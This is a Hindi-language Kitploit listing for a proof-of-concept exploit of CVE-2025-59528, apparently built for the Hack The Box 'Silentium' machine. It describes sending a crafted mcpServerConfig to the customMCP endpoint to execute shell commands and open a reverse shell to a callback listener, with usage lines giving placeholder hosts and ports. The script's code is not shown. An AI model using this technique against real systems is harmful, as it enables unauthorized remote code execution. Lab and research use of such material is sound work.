Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-59528-PoC — CVE-2025-59528 के लिए PoC, जिसका उपयोग HTB पर Silentium मशीन पर रिमोट कोड एक्ज़ीक्यूशन प्राप्त करने के लिए किया जाता है। | Kitploit
उपकरण/GitHubGitHub/loaxert/cve-2025-59528-poc
शोषणवेब एप्लिकेशन शोषणएपीआई सुरक्षा परीक्षणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षापेलोड डेवलपमेंट
GitHubloaxert/cve-2025-59528-poc

CVE-2025-59528-PoC

CVE-2025-59528 के लिए PoC, जिसका उपयोग HTB पर Silentium मशीन पर रिमोट कोड एक्ज़ीक्यूशन प्राप्त करने के लिए किया जाता है।

रिपॉजिटरी देखें
181 महीना पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-59528 शैक्षिक PoC

केवल शैक्षिक उपयोग के लिए। यह परियोजना नियंत्रित सुरक्षा अनुसंधान, कक्षा प्रदर्शन और पृथक प्रयोगशाला में अधिकृत परीक्षण के लिए है। इसका उपयोग उन प्रणालियों, नेटवर्कों, अनुप्रयोगों या खातों के विरुद्ध न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण की आपको स्पष्ट अनुमति नहीं है।

यह PoC क्या प्रदर्शित करता है

यह प्रूफ ऑफ कॉन्सेप्ट प्रदर्शित करता है कि कैसे अनुचित रूप से संभाला गया mcpServerConfig मान सर्वर-साइड JavaScript मूल्यांकन और customMCP नोड-लोड कार्यक्षमता के माध्यम से कमांड निष्पादन की अनुमति दे सकता है।

स्क्रिप्ट दो प्रमाणीकरण विधियों का समर्थन करती है:

  • ईमेल/पासवर्ड: एप्लिकेशन के लॉगिन एंडपॉइंट के माध्यम से प्रमाणीकरण करता है और लौटाए गए सत्र कुकीज़ का पुनः उपयोग करता है।
  • बियरर टोकन: Authorization हेडर में एक API कुंजी भेजता है।

प्रमाणीकरण के बाद, स्क्रिप्ट /api/v1/node-load-method/customMCP पर एक निर्मित कॉन्फ़िगरेशन सबमिट करती है। पेलोड शेल कमांड निष्पादित करने और शोधकर्ता द्वारा नियंत्रित लिसनर से वापस जुड़ने के लिए Node.js चाइल्ड-प्रोसेस कार्यक्षमता का उपयोग करता है। यह व्यवहार केवल अधिकृत प्रयोगशाला वातावरण में संभावित प्रभाव प्रदर्शित करने के लिए शामिल किया गया है।

आवश्यकताएँ

  • Python 3.
  • requests पैकेज।

निर्भरता को इस प्रकार स्थापित करें:

root@kitploit:~
python3 -m pip install requests

उपयोग

स्क्रिप्ट को CVE-2025-59528.py के रूप में सहेजें।

ईमेल और पासवर्ड मोड

root@kitploit:~
python3 CVE-2025-59528.py <email> <password> <target-host> <callback-ip> <callback-port>

केवल दस्तावेज़ीकरण हेतु मानों के साथ उदाहरण:

root@kitploit:~
python3 CVE-2025-59528.py [email protected] 'REDACTED_PASSWORD' lab.example.test 192.0.2.10 4444

बियरर-टोकन मोड

root@kitploit:~
python3 CVE-2025-59528.py <api-key> <target-host> <callback-ip> <callback-port>

केवल दस्तावेज़ीकरण हेतु मानों के साथ उदाहरण:

root@kitploit:~
python3 CVE-2025-59528.py 'REDACTED_API_KEY' lab.example.test 192.0.2.10 4444

स्क्रिप्ट इन एप्लिकेशन रूट्स के उपलब्ध होने की अपेक्षा करती है:

  • /api/v1/auth/login
  • /api/v1/node-load-method/customMCP

वर्तमान स्क्रिप्ट http:// URL बनाती है। ऐसी प्रयोगशाला तैनाती का परीक्षण करते समय जिसे TLS की आवश्यकता होती है, HTTPS के लिए कार्यान्वयन अपडेट करें।

कोड कैसे काम करता है

  1. main() कमांड-लाइन तर्कों की संख्या को मान्य करता है और प्रमाणीकरण मोड का चयन करता है।
  2. login() आपूर्ति किए गए क्रेडेंशियल्स को लॉगिन एंडपॉइंट पर भेजता है।
  3. tokens() Set-Cookie प्रतिक्रिया हेडर से सत्र मान निकालता है।
  4. shell() प्रमाणित अनुरोध का निर्माण करता है और निर्मित mcpServerConfig मान सबमिट करता है।
  5. bearer() सत्र कुकीज़ के बजाय बियरर टोकन का उपयोग करके वही अनुरोध करता है।
  6. प्रतिक्रिया निकाय मुद्रित किया जाता है ताकि शोधकर्ता परिणाम को एप्लिकेशन और सर्वर लॉग्स के साथ सहसंबंधित कर सके।
टूल डाउनलोड करें